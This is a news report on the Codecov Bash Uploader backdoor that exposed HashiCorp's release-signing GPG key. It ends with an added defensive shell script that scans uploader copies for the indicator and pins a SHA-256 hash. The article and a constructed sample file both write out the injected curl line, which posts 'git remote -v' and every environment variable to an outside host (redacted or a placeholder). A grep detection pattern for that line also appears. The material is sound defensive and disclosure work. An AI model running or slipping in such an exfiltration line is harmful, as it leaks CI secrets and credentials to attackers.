Malicious code injected into the Codecov script led to the compromise of HashiCorp's PGP key

HashiCorp, known for developing the open-source tools Vagrant, Packer, Nomad and Terraform, has disclosed the leak of the private GPG key used to produce the digital signatures with which its releases are verified. Attackers who obtained the GPG key could, in principle, ship hidden modifications to HashiCorp products and certify them with a valid digital signature. The company states, however, that its audit found no trace of any attempt to make such modifications.

The compromised GPG key has now been revoked and a new key has been issued in its place. The problem affected only verification via the SHA256SUMS and SHA256SUMS.sig files; it did not affect the signing of the Linux DEB and RPM packages distributed through releases.hashicorp.com, nor the release verification mechanisms for macOS and Windows (Authenticode).

The leak was caused by the use, within HashiCorp's infrastructure, of the Codecov Bash Uploader script (codecov-bash), which is meant to upload coverage reports from continuous integration systems. During the attack on Codecov, a backdoor was planted in that script which sent passwords and cryptographic keys to a server controlled by the attackers.

To carry out the compromise, the attackers exploited an error in the process used to build the Codecov Docker image, which let them extract the credentials for GCS (Google Cloud Storage) needed to modify the Bash Uploader script served from the codecov.io website. The modification was made on January 31, went unnoticed for two months, and let the attackers harvest data stored in customers' continuous integration environments. Through the injected malicious code they could obtain information about the Git repository under test and every environment variable, including the tokens, encryption keys and passwords that continuous integration systems are given to reach application code, repositories and services such as Amazon Web Services and GitHub.

Besides being invoked directly, the Codecov Bash Uploader script is embedded in other uploaders, such as Codecov-action (GitHub), Codecov-circleci-orb and Codecov-bitrise-step, so their users are affected as well. All users of codecov-bash and the products built on it are advised to audit their infrastructure and to rotate secrets and cryptographic keys. A copy of the script can be checked for the backdoor by looking for the line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true (the attacker's host is left blank here).
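As an added example, not code from Codecov, HashiCorp or the original article, the POSIX shell script below does two things a CI owner would want after reading the advice above: it scans a local copy of an uploader script for the indicator line quoted in the article, and it refuses to accept a fetched uploader unless its SHA-256 matches a hash pinned in the caller's own repository. The two sample scripts it writes are constructed for this example; the host 203.0.113.10 in the backdoored sample is a placeholder for the redacted attacker address, and the "pinned" hash is computed from the clean sample rather than taken from any Codecov publication.

```shell
#!/bin/sh
# Added example (not Codecov's or HashiCorp's code): scan an uploader script
# for the exfiltration line from the advisory and gate execution on a pinned
# SHA-256 hash instead of piping curl straight into bash.
set -u

# Portable SHA-256 of a file (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Returns 0 (and prints the matching line) if FILE contains the indicator:
# a curl call whose -d payload exfiltrates `git remote -v` and `env`.
# The host is deliberately not part of the pattern, since it was redacted
# in the disclosure and an attacker can change it freely.
scan_for_backdoor() {
    grep -n -E 'curl[^|]*-d[^|]*\$\(git remote -v\)[^|]*\$\(env\)' "$1"
}

# Returns 0 only if FILE's SHA-256 equals EXPECTED (a hash you commit to your
# own repo after reviewing the uploader once).
verify_pinned() {
    actual=$(sha256_of "$1")
    [ "$actual" = "$2" ]
}

# Combined gate: 0 = safe to execute, 1 = hash mismatch, 2 = indicator found.
check_uploader() {
    verify_pinned "$1" "$2" || return 1
    scan_for_backdoor "$1" >/dev/null && return 2
    return 0
}

# Writes two constructed sample scripts and exports their paths as
# $CLEAN and $BAD. The backdoored one carries the advisory's line with a
# placeholder host (TEST-NET address, not the real exfiltration server).
make_samples() {
    dir=$(mktemp -d)
    CLEAN="$dir/codecov-clean.sh"
    BAD="$dir/codecov-backdoored.sh"
    cat > "$CLEAN" <<'EOF'
#!/bin/bash
# constructed sample: uploader that only posts the coverage file
upload_file="coverage.txt"
url="https://codecov.io/upload/v4"
curl -X POST --data-binary @"$upload_file" "$url"
EOF
    cat > "$BAD" <<'EOF'
#!/bin/bash
# constructed sample: same uploader with the injected exfiltration line
upload_file="coverage.txt"
url="https://codecov.io/upload/v4"
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.10/upload/v2 || true
curl -X POST --data-binary @"$upload_file" "$url"
EOF
}

# Demo on the constructed samples; a real pipeline would pin the hash of the
# uploader it reviewed and run `check_uploader ./codecov "$PINNED" && bash ./codecov`.
make_samples
PINNED=$(sha256_of "$CLEAN")
scan_for_backdoor "$BAD" && echo "indicator found in $BAD"
scan_for_backdoor "$CLEAN" >/dev/null || echo "no indicator in $CLEAN"
check_uploader "$CLEAN" "$PINNED" && echo "clean sample passes the gate"
check_uploader "$BAD" "$PINNED" || echo "backdoored sample rejected (status $?)"
```

The indicator match is useful for triage of copies already on disk, but it only catches this particular injection; the attackers who could rewrite the script could just as easily have changed the payload. The hash pin is the durable control: it turns "whatever codecov.io serves today" into a reviewed artefact, and any upstream change, malicious or not, fails the gate until someone re-reviews and updates the pin.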

Source: opennet.ru